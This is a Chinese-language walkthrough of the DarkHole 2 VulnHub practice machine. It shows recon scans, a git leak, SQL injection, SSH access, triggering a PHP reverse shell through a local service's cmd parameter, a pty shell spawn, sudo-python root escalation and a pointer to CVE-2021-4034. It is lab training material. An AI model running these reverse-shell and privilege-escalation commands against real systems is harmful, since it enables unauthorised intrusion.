| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> PHP知识库 -> DARKHOLE 2 -> 正文阅读 |
|
[PHP知识库]DARKHOLE 2 |
准备攻击机: kali, win11 https://www.vulnhub.com/entry/darkhole-2,740/ 信息搜集与利用主机发现python3 ping.py -H 192.168.91.0/24 如图所示得到目标靶机IP地址: 192.168.91.191 端口扫描nmap -sV -O -A -p- -T4 192.168.91.191 --oN DarkHole2_nmap.txt 目录扫描python3 dirsearch.py -u http://192.168.91.191/ 挨个儿访问 git 泄露
代码审计index.php 中: login.php中: login.php 0904b1 中: config.php 中: COMMIT_EDITMSG 中: HTTPhttp://192.168.91.191/login.php SQLI注入手动注入的话,是很基础的。详细步骤省略。
如图所示:得到 ssh 表中的用户和密码: ssh 登陆既然是 ssh 表,那么尝试ssh 登陆 cat /etc/passwd | grep "/bin/bash" 查看 历史命令记录 查看 socket 统计信息 提权方法一方法一:按照作者思路 curl "http://127.0.0.1:9999/" 编辑本地得 php-reverse-shell.php 将IP改为 kali 得 IP地址和监听端口。 在本地启动一个http 服务用于下载 然后将其下载到把集中,然后 利用 127.0.0.1?cmd 来执行 执行 curl "http://127.0.0.1:9999/?cmd=php%20/tmp/php-reverse-shell.php" python3 -c "import pty;pty.spawn(’/bin/bash’)" flag 1losy 家目录下 user.txt 在 jehad 用户中我们查看了 命令历史记录,在这里我们查看一下啊 losy 用户的历史记录 cat -n ./bash_history sudo -l 查看命令 直接 sudo /usr/bin/python3 执行python 文件就能得到 root sudo /usr/bin/python3 -c "import os;os.system(’/bin/bash’)" flag 2方法二find / -perm -u=s -type f 2>/dev/null 在我以前的文章中有说到 这个漏洞。这个漏洞今年才发布,在2021年的l对于Linux 影响很深,几乎所有的发行版本都存在这个漏洞,因此这个靶机诞生的那一天,这个漏洞还不存在。在今天(2022年2月18日)来说这就是一个新的提权方法。关于 CVE-2021-4034 的详细信息请自行搜索。 直接利用它: 具体使用方法请看我最近的文章。 总结
|
|
PHP知识库 最新文章 |
Laravel 下实现 Google 2fa 验证 |
UUCTF WP |
DASCTF10月 web |
XAMPP任意命令执行提升权限漏洞(CVE-2020- |
[GYCTF2020]Easyphp |
iwebsec靶场 代码执行关卡通关笔记 |
多个线程同步执行,多个线程依次执行,多个 |
php 没事记录下常用方法 (TP5.1) |
php之jwt |
2021-09-18 |
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 | -2024/11/23 10:30:33- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |